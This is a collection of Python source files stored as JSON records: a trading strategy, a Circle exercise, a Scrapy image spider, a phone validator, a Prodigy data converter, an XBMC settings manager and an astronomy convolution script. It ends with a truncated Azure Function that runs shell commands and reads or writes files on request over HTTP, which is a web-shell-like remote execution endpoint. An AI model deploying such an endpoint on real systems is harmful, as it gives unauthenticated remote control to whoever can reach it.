context.lmd=0.9\n context.aa = pd.DataFrame(np.zeros([1, 2]), columns=[0, 1])\n #print(aa)\n #context.c = 0.01\n\ndef before_trading(context):\n c=context.c\n lmd=context.lmd\n P = context.P\n aa = context.aa.tail(1)\n aai = np.matrix(aa).T\n try:\n numerator = history_bars(context.s1, 1, '1d', 'close').mean()\n denominator = history_bars(context.s1, 5, '1d', 'close').mean()\n tmp = history_bars(context.s1, 2, '1d', 'close')\n r = log(tmp[1]/tmp[0])\n avg_return = log(numerator/denominator)\n y1 = meb(avg_return, 0, c, 2 * c)\n y2 = meb(avg_return, c, 2 * c, 3 * c)\n y3 = meb(avg_return, 2 * c, 3 * c, 3 * c)\n y4 = meb(avg_return, -2 * c, -c, 0)\n y5 = meb(avg_return, -3 * c, -2 * c, -c)\n y6 = meb(avg_return, -3 * c, -3 * c, -2 * c)\n y7 = meb(avg_return, -c, 0, c)\n ya = y1 + y2 + y3 + y7\n yb = y4 + y5 + y6 + y7\n #print(ya,yb)\n if ya==0:\n ed6=0\n else:\n ed6 = (0.1 * y1 + 0.2 * y2 + 0.4 * y3) / ya\n if yb==0:\n ed7=0\n else:\n ed7 = (0.1 * y4 + 0.2 * y5 + 0.4 * y6) / yb\n #print(ed6,ed7)\n X = np.matrix([[ed6],[ed7]])\n K = P * X / (X.T * P * X - lmd)\n aat = (aai + K * (r - X.T * aai)).T\n context.P = (P - K * X.T * P) / lmd\n #print(context.aa.append(pd.DataFrame(aat), ignore_index=True))\n context.aa=context.aa.append(pd.DataFrame(aat), ignore_index=True) \n except:\n print(\"Error when trying\")\n #print(tmp)\n \ndef handle_bar(context, bar_dict):\n\n # 开始编写你的主要的算法逻辑\n\n # bar_dict[order_book_id] 可以拿到某个证券的bar信息\n # context.portfolio 可以拿到现在的投资组合状态信息\n\n # 使用order_shares(id_or_ins, amount)方法进行落单\n # TODO: 开始编写你的算法吧!\n aa = context.aa.tail(1)\n print(\"im running\")\n if aa.iloc[0,0]>0:\n # order_percent并且传入1代表买入该股票并且使其占有投资组合的100%\n order_percent(context.s1, 0.2)\n #context.fired = True\n else:\n order_percent(context.s1, -0.5)","sub_path":"FBB.py","file_name":"FBB.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"27823218","text":"'''2. Write a program which contains one class named as Circle.\nCircle class contains three instance variables as Radius ,Area, Circumference.\nThat class contains one class variable as PI which is initialise to 3.14.\nInside init method initialise all instance variables to 0.0.\nThere are three instance methods inside class as Accept(), CalculateArea(),\nCalculateCircumference(), Display().\nAccept method will accept value of Radius from user.\nCalculateArea() method will calculate area of circle and store it into instance variable Area.\nCalculateCircumference() method will calculate circumference of circle and store it into instance\nvariable Circumference.\nAnd Display() method will display value of all the instance variables as Radius , Area,\nCircumference.\nAfter designing the above class call all instance methods by creating multiple objects.'''\n\n\nclass Circle:\n PI = 3.14;\n\n def __init__(self):\n self.radius = 0.0;\n self.area = 0.0\n self.cer = 0.0\n\n def Accept(self):\n print(\"Enter the value\")\n self.radius = float(input())\n\n def Area(self):\n self.area = self.PI * self.radius ** 2;\n\n def Circumference(self):\n self.cer = self.PI * self.radius * 2;\n\n def Display(self):\n print(\"area is{0}\\n circumference is{1}\".format(self.area, self.cer))\n\n\ndef main():\n obj1 = Circle()\n obj2 = Circle()\n obj3 = Circle()\n obj4 = Circle()\n\n obj1.Accept()\n obj1.Area()\n obj1.Circumference()\n obj1.Display()\n\n obj2.Accept()\n obj2.Area()\n obj2.Circumference()\n obj2.Display()\n\n obj3.Accept()\n obj3.Area()\n obj3.Circumference()\n obj3.Display()\n\n obj4.Accept()\n obj4.Area()\n obj4.Circumference()\n obj4.Display()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"A2.py","file_name":"A2.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"187045953","text":"# -*- coding: utf-8 -*-\nimport logging\nimport scrapy\n\nfrom ..items import OoxxItem, OoxxItemLoader\nfrom scrapy.shell import inspect_response\nfrom scrapy.settings import default_settings\n\n\nclass OoxxSpider(scrapy.Spider):\n name = 'wuliao'\n allowed_domains = ['jandan.net']\n start_urls = ['http://jandan.net/pic']\n\n def parse(self, response):\n # fetch current page's all li elements\n for item_selector in response.css('ol.commentlist > li[id^=\"comment-\"]'):\n # fill the item data\n item = OoxxItemLoader(item=OoxxItem(),\n selector=item_selector,\n response=response)\n # author name field\n item.add_css('author_name', 'div.author > strong::text')\n\n # img url\n item.add_css('pic_url', 'div.text > p > a.view_img_link::attr(href)')\n\n # public date text description\n item.add_css('pub_date', 'div.author > small > a::text')\n\n yield item.load_item()\n\n # follow next page\n # CLOSESPIDER_PAGECOUNT=2\n next_page_selector = response.css('div.cp-pagenavi > a.previous-comment-page::attr(href)')\n if next_page_selector:\n # self.log(response.urljoin(next_page_selector.extract_first()), logging.INFO)\n yield scrapy.Request(response.urljoin(next_page_selector.extract_first()))\n","sub_path":"jandan/jandan/spiders/wuliao.py","file_name":"wuliao.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"6716113","text":"# -*- coding: UTF-8 -*-\nimport re\n\nfrom DeBar.classes import Text\nfrom DeBar.classes import Variaveis\n\n\nclass Telefone(Variaveis):\n\n def __init__(self, telefone):\n super(Telefone, self).__init__()\n self.setValor(telefone)\n\n def setValor(self, telefone):\n\n if telefone:\n self.valor = telefone\n teste = self.valor[0:1]\n if self.valor[0:1] == '0':\n self.valor = self.valor[1:]\n\n self.valor = re.sub(\"[(-)]\", \"\", self.valor)\n self.valor = self.valor.replace(\" \", \"\")\n\n if self.valor:\n try:\n int(self.valor)\n except ValueError:\n self.mensagem = Text().apenas_numeros(self.__class__.__name__)\n\n if len(self.valor) == 10 or len(self.valor) == 11:\n self.validaDDD()\n else:\n self.mensagem = Text().dado_invalido(self.__class__.__name__)\n else:\n self.mensagem = Text().dado_invalido(self.__class__.__name__)\n else:\n self.mensagem = Text().dado_invalido(self.__class__.__name__)\n\n def validaDDD(self):\n\n ddds = {11,12,13,14,15,16,17,18,19,21,22,\n 24,27,28,31,32,33,34,35,37,38,41,\n 42,43,44,45,46,47,48,49,51,53,54,\n 55,61,62,63,64,65,66,67,68,69,71,\n 73,74,75,77,79,81,82,83,84,85,86,\n 87,88,89,91,92,93,94,95,96,97,98,99}\n\n ddd = self.valor[0:2]\n\n try:\n ddd = int(ddd)\n except:\n self.mensagem = Text().apenas_numeros(\"DDD\")\n\n if ddd in ddds:\n self.isvalido = True\n else:\n self.mensagem = Text().dado_invalido(\"DDD\")\n","sub_path":"DeBar/classes/usuario/telefone.py","file_name":"telefone.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"623049082","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport copy\nimport itertools\n\nimport en_core_web_sm as model\nimport plac\n\nfrom ..io import read_jsonl, write_jsonl\nfrom ..logger import logger\n\n\nclass ReachToProdigy:\n \"\"\"\n Converts json of scraped reference section into prodigy style json.\n\n The resulting json can then be loaded into prodigy is required.\n\n Expects dict in the following format:\n\n ```\n {\n ...,\n \"sections\": {\n \"Reference\": \"References\\n1. Upson. M. (2018) ...\"\n }\n }\n\n ```\n\n Returns references in the following format:\n\n ```\n [{\n 'text': ' This is an example with a linebreak\\n',\n 'meta': {'doc_hash': None, 'provider': None, 'line_number': 3},\n 'tokens': [\n {'text': ' ', 'start': 0, 'end': 1, 'id': 0},\n {'text': 'This', 'start': 1, 'end': 5, 'id': 1},\n {'text': 'is', 'start': 6, 'end': 8, 'id': 2},\n {'text': 'an', 'start': 9, 'end': 11, 'id': 3},\n {'text': 'example', 'start': 12, 'end': 19, 'id': 4},\n {'text': 'with', 'start': 20, 'end': 24, 'id': 5},\n {'text': 'a', 'start': 25, 'end': 26, 'id': 6},\n {'text': 'linebreak', 'start': 27, 'end': 36, 'id': 7},\n {'text': '\\n', 'start': 36, 'end': 37, 'id': 8}]\n },\n ...\n ]\n\n ```\n \"\"\"\n\n def __init__(\n self, ref_sections, lines=10, split_char=\"\\n\", add_linebreak=True, join_char=\" \"\n ):\n \"\"\"\n Args:\n ref_sections(list): List of dicts extracted in scrape.\n lines(int): Number of lines to combine into one chunk\n split_char(str): Character to split lines on.\n add_linebreak(bool): Should a linebreak be re-added so that it is\n clear where a break was made?\n join_chars(str): Which character will be used to join lines at the\n point which they are merged into a chunk.\n \"\"\"\n\n self.ref_sections = ref_sections\n self.lines = lines\n self.split_char = split_char\n self.add_linebreak = add_linebreak\n self.join_char = join_char\n\n self.nlp = model.load()\n\n def run(self):\n \"\"\"\n Main method of the class\n \"\"\"\n\n prodigy_format = []\n\n for i, refs in enumerate(self.ref_sections):\n\n one_record = self.one_record_to_prodigy_format(\n refs,\n self.nlp,\n self.lines,\n self.split_char,\n self.add_linebreak,\n self.join_char,\n )\n\n # If something is returned (i.e. there is a ref section)\n # then append to prodigy_format.\n\n if one_record:\n\n prodigy_format.append(one_record)\n\n out = list(itertools.chain.from_iterable(prodigy_format))\n\n logger.info(\"Returned %s reference sections\", len(out))\n\n return out\n\n def one_record_to_prodigy_format(\n self,\n input_dict,\n nlp,\n lines=10,\n split_char=\"\\n\",\n add_linebreak=True,\n join_char=\" \",\n ):\n \"\"\"\n Convert one dict produced by the scrape to a list of prodigy dicts\n\n Args:\n input_dict(dict): One reference section dict from the scrape\n nlp: A spacy model, for example loaded with spacy.load(\"en_core_web_sm\")\n lines(int): Number of lines to combine into one chunk\n split_char(str): Character to split lines on.\n add_linebreak(bool): Should a linebreak be re-added so that it is\n clear where a break was made?\n join_chars(str): Which character will be used to join lines at the\n point which they are merged into a chunk.\n \"\"\"\n\n out = []\n\n # Only continue if references are found\n\n if input_dict:\n\n sections = input_dict.get(\"sections\")\n\n # If there is something in sections: this will be a keyword for example\n # reference, or bibliography, etc\n\n if sections:\n\n # In case there are more than one keyword, cycle through them\n\n for _, refs in sections.items():\n\n # Refs will be a list, so cycle through it in case there was\n # more than one section found with the same keyword\n\n for ref in refs:\n\n if refs:\n\n refs_lines = self.split_lines(\n ref, split_char=split_char, add_linebreak=add_linebreak\n )\n refs_grouped = self.combine_n_rows(\n refs_lines, n=lines, join_char=join_char\n )\n\n _meta = {\n \"doc_hash\": input_dict.get(\"file_hash\"),\n \"provider\": input_dict.get(\"provider\"),\n }\n\n for i, lines in enumerate(refs_grouped):\n\n meta = copy.deepcopy(_meta)\n\n meta[\"line_number\"] = i\n\n tokens = nlp.tokenizer(lines)\n formatted_tokens = [\n self.format_token(i) for i in tokens\n ]\n\n out.append(\n {\n \"text\": lines,\n \"meta\": meta,\n \"tokens\": formatted_tokens,\n }\n )\n\n return out\n\n def format_token(self, token):\n \"\"\"\n Converts prodigy token to dict of format:\n\n {\"text\":\"of\",\"start\":32,\"end\":34,\"id\":5}\n \"\"\"\n out = dict()\n out[\"text\"] = token.text\n out[\"start\"] = token.idx\n out[\"end\"] = token.idx + len(token)\n out[\"id\"] = token.i\n\n return out\n\n def combine_n_rows(self, doc, n=5, join_char=\" \"):\n \"\"\"\n Splits a document into chunks of length `n` lines.\n\n Args:\n doc(str): A document as a string.\n n(int): The number of lines allowed in each chunk.\n join_char(str): The character used to join lines within a chunk.\n\n Returns:\n list: A list of chunks containing `n` lines.\n \"\"\"\n\n indices = list(range(len(doc)))\n\n # Split the document into blocks\n\n groups = list(zip(indices[0::n], indices[n::n]))\n\n # Iterate through each group of n rows, convert all the items\n # to str, and concatenate into a single string\n\n out = [join_char.join([str(j) for j in doc[beg:end]]) for beg, end in groups]\n\n # Check whether there is a remainder and concatenate if so\n\n max_index = len(groups) * n\n\n last_group = join_char.join([str(j) for j in doc[max_index : len(doc)]])\n\n out.append(last_group)\n\n return out\n\n def split_lines(self, doc, split_char=\"\\\\n\", add_linebreak=True):\n \"\"\"\n Split a document by `split_char`\n\n Args:\n doc(str): A document containing references\n split_char(str): Character by which `doc` will be split\n add_linebreak(bool): If `True`, re-adds the linebreak character to the\n end of each line that is split.\n\n Returns:\n (list): List of split lines (str).\n\n \"\"\"\n\n lines = doc.split(split_char)\n\n if add_linebreak:\n lines = [i + split_char for i in lines]\n\n return lines\n\n\n@plac.annotations(\n input_file=(\n \"Path to jsonl file containing produced by scraper and containing reference sections.\",\n \"positional\",\n None,\n str,\n ),\n output_file=(\n \"Path to jsonl file into which prodigy format references will be saved.\",\n \"positional\",\n None,\n str,\n ),\n lines=(\"How many lines to include in an annotation example.\", \"option\", \"l\", int),\n split_char=(\"Which character to split lines on.\", \"option\", \"s\", str),\n no_linebreak=(\n \"Don't re-add linebreaks to the annotation examples after splitting.\",\n \"flag\",\n \"n\",\n str,\n ),\n join_char=(\n \"Which character should be used to join lines into an annotation example.\",\n \"option\",\n \"j\",\n str,\n ),\n)\ndef reach_to_prodigy(\n input_file,\n output_file,\n lines=10,\n split_char=\"\\\\n\",\n no_linebreak=False,\n join_char=\" \",\n):\n\n print(split_char)\n\n scraped_json = read_jsonl(input_file)\n\n logger.info(\"Loaded %s scraped examples\", len(scraped_json))\n\n if no_linebreak:\n add_linebreak = False\n else:\n add_linebreak = True\n\n prodigy_format_references = ReachToProdigy(\n scraped_json,\n lines=lines,\n split_char=split_char,\n add_linebreak=add_linebreak,\n join_char=join_char,\n )\n\n references = prodigy_format_references.run()\n\n write_jsonl(references, output_file=output_file)\n\n logger.info(\"Prodigy format written to %s\", output_file)\n","sub_path":"deep_reference_parser/prodigy/reach_to_prodigy.py","file_name":"reach_to_prodigy.py","file_ext":"py","file_size_in_byte":9245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18653490","text":"# ScriptName : settingsmgr.py\n# Version = '0.3'\n# Author : Van der Phunck aka Aslak Grinsted. as@phunck.cmo <- not cmo but com\n# Desc : settingsmanager for python\n#\n# \n# \n#\n\n\nimport xbmc, xbmcgui\nimport sys, traceback\nimport os.path\nfrom xml.dom.minidom import parse, parseString\n\nguiTitlePos=[10,6,80,15]\nguiMenuPos=[10,20,80,75]\n\nif xbmc.getSkinDir().lower().find('iii')>=0: #project mayhem iii\n\tguiMenuPos=[27,20,70,75]\n\n#-------------xml------------------\nNODE_ELEMENT=1\nNODE_ATTRIBUTE=2\nNODE_TEXT=3\nNODE_CDATA_SECTION=4\n\n\nACTION_MOVE_LEFT = 1 \nACTION_MOVE_RIGHT = 2\nACTION_MOVE_UP = 3\nACTION_MOVE_DOWN = 4\nACTION_PAGE_UP = 5 #left trigger\nACTION_PAGE_DOWN = 6 #right trigger\nACTION_SELECT_ITEM = 7 #A button\nACTION_HIGHLIGHT_ITEM = 8 \nACTION_PARENT_DIR = 9 #B button\nACTION_PREVIOUS_MENU = 10 #back button\nACTION_SHOW_INFO = 11\nACTION_PAUSE = 12\nACTION_STOP = 13\nACTION_NEXT_ITEM = 14\nACTION_PREV_ITEM = 15\nACTION_XBUTTON\t\t= 18 #Y Button\nACTION_WHITEBUTTON\t= 117 \n\nScriptPath = os.getcwd()\nif ScriptPath[-1]==';': ScriptPath=ScriptPath[0:-1]\nif ScriptPath[-1]!='\\\\': ScriptPath=ScriptPath+'\\\\'\n\n\ntry: Emulating = xbmcgui.Emulating #Thanks alot to alexpoet for the xbmc.py,xmbcgui.py emulator. Very useful!\nexcept: Emulating = False\n\n\ndef message(line1,line2='',line3=''):\n\tdialog = xbmcgui.Dialog()\n\tdialog.ok(\"Info\", line1,line2,line3)\n\ndef printLastError():\n\te=sys.exc_info()\n\ttraceback.print_exception(e[0],e[1],e[2])\n\ndef lastErrorString():\n\treturn sys.exc_info()[1]\n\n####################################################################################\n\ndef GetNodeText(node):\n\tdout=''\n\tfor tnode in node.childNodes:\n\t\tif (tnode.nodeType==NODE_TEXT)|(tnode.nodeType==NODE_CDATA_SECTION):\n\t\t\tdout=dout+tnode.nodeValue\n\treturn dout.encode(\"iso-8859-1\")\n\ndef GetNodeValue(node,tag=None): #helper function for xml reading\n\tif tag is None: return GetNodeText(node)\n\tnattr=node.attributes.getNamedItem(tag)\n\tif not (nattr is None): return nattr.value.encode(\"iso-8859-1\")\n\tfor child in node.childNodes:\n\t\tif child.nodeName==tag:\n\t\t\treturn GetNodeText(child)\n\treturn None\n \ndef GetChildNode(node,tag):\n\tfor child in node.childNodes:\n\t\tif child.nodeName==tag: return child\n\treturn None\n\ndef GetParamValue(pnode):\n\ttype=GetNodeValue(pnode,\"type\")\n\tif type=='string': return str(GetNodeValue(pnode,'value'))\n\tif type=='float': return float(GetNodeValue(pnode,'value'))\n\tif type=='int': return int(GetNodeValue(pnode,'value'))\n\tif type=='boolean': return bool(GetNodeValue(pnode,'value'))\n\tif type=='select': return int(GetNodeValue(pnode,'value'))\n\treturn \"unknown type:\"+str(GetNodeValue(pnode,'value'))\n\ndef SetParamValue(pnode,value):\n\ttype=GetNodeValue(pnode,'type')\n\tvaluenode=GetChildNode(pnode,'value')\n\tchildren=valuenode.childNodes\n\tfor child in children:\n\t\tvaluenode.removeChild(child)\n\tdoc=pnode.ownerDocument\n\tif type=='string':\n\t\tnewnode=doc.createCDATASection(str(value))\n\telse:\n\t\tnewnode=doc.createTextNode(str(value))\n\tvaluenode.appendChild(newnode)\n\ndef GetSelectOptions(pnode):\n\toptions=[]\n\tfor child in pnode.childNodes:\n\t\tif child.nodeName=='option': options.append(str(GetNodeText(child)))\n\treturn options\n\n####################################################################################\n\ndef OpenControlPanel(settingsfile):\n\tcp = ControlPanel()\n\tcp.setSettingsfile(settingsfile)\n\tcp.doModal()\n\tresult = cp.isConfirmed()\n\tdel cp\n\treturn result\n\ndef ReadSettings(settingsfile):\n\tdom = parse(settingsfile)\n\tparams=dom.getElementsByTagName(\"param\")\n\tsettings={}\n\tfor param in params:\n\t\tid=GetNodeValue(param,'id')\n\t\tsettings[id]=GetParamValue(param)\n\treturn settings\n\nclass ControlPanel(xbmcgui.Window):\n\tdef __init__(self):\n\t\tif Emulating: xbmcgui.Window.__init__(self) #for emulator to work\n\n\t\tw=self.getWidth()\n\t\th=self.getHeight()\n\t\tself.xratio=float(w/100.0)\n\t\tself.yratio=float(h/100.0)\n\n\t\tself.result = False\n\t\ttry:\n\t\t\tself.bg = xbmcgui.ControlImage(0,0,w,h, 'background.png')\n\t\t\tself.addControl(self.bg)\n\t\texcept:\n\t\t\tpass\n\t\t\n\n\t\tself.title = xbmcgui.ControlFadeLabel(int(self.xratio*guiTitlePos[0]),int(self.yratio*guiTitlePos[1]),int(self.xratio*guiTitlePos[2]),int(self.yratio*guiTitlePos[3]), 'font18','0xFFFFFFFF')\n\t\tself.addControl(self.title)\n\n\t\tself.list=xbmcgui.ControlList(int(self.xratio*guiMenuPos[0]),int(self.yratio*guiMenuPos[1]),int(self.xratio*guiMenuPos[2]),int(self.yratio*guiMenuPos[3]), 'font14','0xFFFFFFFF')\n\t\tself.addControl(self.list)\n\t\tself.listnodes=[]\n\n\tdef isConfirmed(self):\n\t\treturn self.result\n\t\n\tdef fillList(self,node):\n\t\tself.listnodes=[]\n\t\tself.title.reset()\n\t\tself.title.addLabel(str(GetNodeValue(node,\"name\")))\n\t\tself.list.reset()\n\t\tfor child in node.childNodes:\n\t\t\tname=None\n\t\t\tif child.nodeName=='param':\n\t\t\t\tname=GetNodeValue(child,\"name\")\n\t\t\t\ttype=GetNodeValue(child,\"type\")\n\t\t\t\tvalue=GetParamValue(child)\n\t\t\t\tif type==\"select\":\n\t\t\t\t\toptions=GetSelectOptions(child)\n\t\t\t\t\tvalue=options[value]\n\t\t\t\tname=name+': '+str(value)\n\t\t\tif child.nodeName=='settings':\n\t\t\t\tname='* '+GetNodeValue(child,\"name\")\n\t\t\tif name:\n\t\t\t\tself.list.addItem(name)\n\t\t\t\tself.listnodes.append(child)\n\t\tself.setFocus(self.list)\n\t\n\tdef saveSettings(self):\n\t\txmlstring=self.dom.toxml()\n\t\tf=file(self.settingsfile,'wb')\n\t\tresult = False\n\t\ttry:\n\t\t\tf.write(xmlstring)\n\t\t\tresult = True\n\t\tfinally:\n\t\t\tf.close()\n\t\treturn result\n\t\t\n\tdef setSettingsfile(self,settingsfile):\n\t\ttry:\n\t\t\tself.settingsfile = settingsfile\n\t\t\tself.dom = parse(self.settingsfile)\n\t\t\tself.node = self.dom.getElementsByTagName('settings').item(0)\n\t\t\tself.fillList(self.node)\n\t\t\t\n\t\texcept:\n\t\t\tself.close()\n\t\t\traise\n\n\n\t\t\n\tdef onAction(self, action):\n\t\tif action == ACTION_PREVIOUS_MENU:\n\t\t\tdialog = xbmcgui.Dialog()\n\t\t\tif dialog.yesno(\"Settings\", \"Do you want to save your settings?\"):\n\t\t\t\tself.result = self.saveSettings()\n\t\t\tself.close()\n\t\t\treturn\n\t\ttry:\n\t\t\tnewvalue = None\n\t\t\tselectedNode = self.listnodes[self.list.getSelectedPosition()]\n\t\t\tlistitem=self.list.getSelectedItem()\n\t\t\tif action == ACTION_PARENT_DIR:\n\t\t\t\tparentNode=selectedNode.parentNode\n\t\t\t\tif parentNode.nodeName=='settings':\n\t\t\t\t\tself.fillList(parentNode)\n\t\t\t\t\treturn\n\t\t\tif (selectedNode.nodeName=='settings') and (action == ACTION_SELECT_ITEM):\n\t\t\t\tself.fillList(selectedNode)\n\t\t\t\treturn\n\t\t\t\t\n\t\t\tif selectedNode.nodeName=='param':\n\t\t\t\ttype=GetNodeValue(selectedNode,'type')\n\t\t\t\tname=GetNodeValue(selectedNode,'name')\n\t\t\t\tvalue=GetParamValue(selectedNode)\n\t\t\t\tif (type=='string') or (type=='float') or (type=='int'):\n\t\t\t\t\tif action == ACTION_SELECT_ITEM:\n\t\t\t\t\t\tkeyboard=xbmc.Keyboard(str(value))\n\t\t\t\t\t\tkeyboard.doModal()\n\t\t\t\t\t\tnewvalue=keyboard.getText()\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tif type=='float': newvalue=float(newvalue)\n\t\t\t\t\t\t\tif type=='int': newvalue=int(newvalue)\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tnewvalue=None\n\t\t\t\tif (type=='boolean'):\n\t\t\t\t\tif (action==ACTION_SELECT_ITEM):\n\t\t\t\t\t\tnewvalue=(not value)\n\t\t\t\tnewvaluestring=str(newvalue)\n\t\t\t\tif (type=='select'):\n\t\t\t\t\toptions=GetSelectOptions(selectedNode)\n\t\t\t\t\tif (action == ACTION_MOVE_LEFT) or (action == ACTION_SELECT_ITEM): newvalue=value+1\n\t\t\t\t\tif (action == ACTION_MOVE_RIGHT): newvalue=value-1\n\t\t\t\t\tif newvalue:\n\t\t\t\t\t\tnewvalue=newvalue % len(options)\n\t\t\t\t\t\tnewvaluestring=str(options[newvalue])\n\t\t\t\tif not (newvalue is None):\n\t\t\t\t\tSetParamValue(selectedNode,newvalue)\n\t\t\t\t\tlistitem.setLabel(name+': '+newvaluestring)\n\t\texcept: \n\t\t\ttry:\n\t\t\t\tself.close()\n\t\t\t\tprint('Error!') \n\t\t\t\tprintLastError()\n\t\t\texcept: \n\t\t\t\tpass\n\n\tdef onControl(self,control):\n\t\tpass\n","sub_path":"Flickr/include/settingsmgr.py","file_name":"settingsmgr.py","file_ext":"py","file_size_in_byte":7527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"340755852","text":"#!/usr/bin/env python\nimport os\nimport sys\nfrom typing import Optional\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import rc\nfrom numpy import ndarray\n\nimport eniric\nimport eniric.io_module as io\nfrom eniric.broaden import convolution\nfrom eniric.obsolete.utilities import read_spectrum\n\n# set stuff for latex usage\nrc(\"text\", usetex=True)\n\ndata_rep = eniric.paths[\"phoenix_dat\"]\nresults_dir = eniric.paths[\"results\"]\nresampled_dir = eniric.paths[\"resampled\"]\n\n# models form PHOENIX-ACES\nM0_ACES = data_rep + \"lte03900-4.50-0.0.PHOENIX-ACES-AGSS-COND-2011-HiRes_wave.dat\"\nM3_ACES = data_rep + \"lte03500-4.50-0.0.PHOENIX-ACES-AGSS-COND-2011-HiRes_wave.dat\"\nM6_ACES = data_rep + \"lte02800-4.50-0.0.PHOENIX-ACES-AGSS-COND-2011-HiRes_wave.dat\"\nM9_ACES = data_rep + \"lte02600-4.50-0.0.PHOENIX-ACES-AGSS-COND-2011-HiRes_wave.dat\"\n\n\ndef run_convolutions(spectrum_string: str, band: str) -> None:\n \"\"\"\n Runs the convolutions for a set of spectra in batch\n \"\"\"\n vsini = [1.0, 5.0, 10.0]\n R = [60000, 80000, 100000]\n\n spectrum = spectrum_string # removed exec usage\n print(spectrum)\n print(\n \"Running the convolutions for spectra of {0:s} in band {1:s}\\n.\".format(\n spectrum, band\n )\n )\n for vel in vsini:\n for res in R:\n convolve_spectra(spectrum, band, vel, res)\n\n\ndef save_convolution_results(\n filename: str, wavelength: ndarray, flux: ndarray, convolved_flux: ndarray\n) -> int:\n \"\"\"Saves convolution results to a file.\n\n Parameters\n ----------\n filename: str\n wavelength: array-like\n flux, convolved_flux\n \"\"\"\n print(\"Saving results...\")\n\n # Note: difference in sampling at 1.0 and 1.5 microns makes jumps\n # in the beginning of Y and H bands\n eniric.obsolete.IOmodule.write_e_3col(filename, wavelength, flux, convolved_flux)\n print(\"Done.\")\n return 0\n\n\ndef convolve_spectra(\n spectrum,\n band,\n vsini,\n R,\n epsilon: float = 0.6,\n fwhm_lim: float = 5.0,\n num_procs: Optional[int] = None,\n results_dir: str = results_dir,\n normalize: bool = True,\n output_name: Optional[str] = None,\n) -> int:\n \"\"\"Load Spectrum, apply convolution and then save results.\"\"\"\n print(\"Reading the data...\")\n wav, flux = read_spectrum(spectrum) # In microns and photon flux.\n print(\"Done.\")\n\n wav_band, flux_band, convolved_flux = convolution(\n wav,\n flux,\n vsini,\n R,\n band,\n epsilon=epsilon,\n fwhm_lim=fwhm_lim,\n num_procs=num_procs,\n normalize=normalize,\n )\n if not normalize:\n norm_ = \"_unnormalized\"\n else:\n norm_ = \"\"\n\n if output_name is None:\n name_model = name_assignment(spectrum)\n\n filename = \"{0}Spectrum_{1}_{2}band_vsini{3:3.1f}_R{4:d}k{5}.dat\".format(\n results_dir, name_model, band, vsini, R / 1000, norm_\n )\n else:\n filename = os.path.join(results_dir, output_name)\n\n save_convolution_results(filename, wav_band, flux_band, convolved_flux)\n\n return 0\n\n\n###############################################################################\ndef name_assignment(spectrum: str):\n \"\"\"\n assigns a name to the filename in which the spectrum is going to be saved\n \"\"\"\n # Simplified to temperature and base in spectrum name.\n m0_aces = \"lte03900\"\n m3_aces = \"lte03500\"\n m6_aces = \"lte02800\"\n m9_aces = \"lte02600\"\n base = \"PHOENIX-ACES-AGSS-COND-2011-HiRes_wave.dat\"\n if (m0_aces in spectrum) and (base in spectrum):\n name = \"M0-PHOENIX-ACES\"\n elif (m3_aces in spectrum) and (base in spectrum):\n name = \"M3-PHOENIX-ACES\"\n elif (m6_aces in spectrum) and (base in spectrum):\n name = \"M6-PHOENIX-ACES\"\n elif (m9_aces in spectrum) and (base in spectrum):\n name = \"M9-PHOENIX-ACES\"\n else:\n raise ValueError(\"Name {0} not found!\".format(spectrum))\n return name\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 3:\n run_convolutions(sys.argv[1], sys.argv[2])\n else:\n print(\"Arguments not compatible with called function.\")\n","sub_path":"eniric/obsolete/nIRanalysis.py","file_name":"nIRanalysis.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"181512063","text":"import logging\n\nimport azure.functions as func\n\nimport subprocess\nimport json\nimport os\nimport base64\nfrom traceback import format_tb\n\nfrom .general_utils import *\n\nREAD_BINARY = \"rb\"\nWRITE = \"w\"\n\n# if true, LEX will return traceback info when encountering unexpected exceptions\nINCLUDE_TRACEBACK_IN_RESPONSE = False\nif \"LEX_TRACE\" in os.environ:\n if os.environ[\"LEX_TRACE\"] == \"True\":\n INCLUDE_TRACEBACK_IN_RESPONSE = True\n\n\"\"\"\n* Handler\n\"\"\"\ndef handler(req: func.HttpRequest) -> func.HttpResponse:\n logging.info(\"[+] LEX: Starting...\")\n\n req = req.get_body().decode('utf8')\n try:\n req = json.loads(req)\n except json.decoder.JSONDecodeError as e:\n return construct_exception_response(e)\n\n try:\n action, data = parse_action(req)\n\n # Bash commands\n if action == CMD_ACTION:\n return_code, out = run_cmd(data)\n return construct_cmd_response(return_code, out)\n\n # Get file \n elif action == GETFILE_ACTION:\n if \"file\" not in data or \"mode\" not in data:\n return construct_response(LEXResult.ERR, \"[!] Get file request should contain file and mode\")\n result, out = run_getfile(data[\"file\"], data[\"mode\"])\n return construct_getfile_response(result, out)\n\n # Put file\n elif action == PUTFILE_ACTION:\n if \"path\" not in data or \"content\" not in data or \"mode\" not in data:\n return construct_response(LEXResult.ERR, \"[!] Put file request should contain path, content and mode\")\n result, out = run_putfile(data[\"path\"], data[\"content\"], data[\"mode\"])\n return construct_putfile_response(result, out)\n\n\n except Exception as e:\n return construct_exception_response(e)\n\n\ndef parse_action(event):\n \"\"\"\n * Returns action, data from event\n \"\"\"\n simple_response = False\n if \"body\" in event:\n body = json.loads(event[\"body\"])\n else:\n body = event\n\n if ACTION in body:\n if body[ACTION] == CMD_ACTION:\n if CMD_ACTION in body:\n return CMD_ACTION, body[CMD_ACTION]\n else:\n raise Exception(\"[!] parse_action: cmd request does not include a command\")\n\n elif body[ACTION] == GETFILE_ACTION:\n if 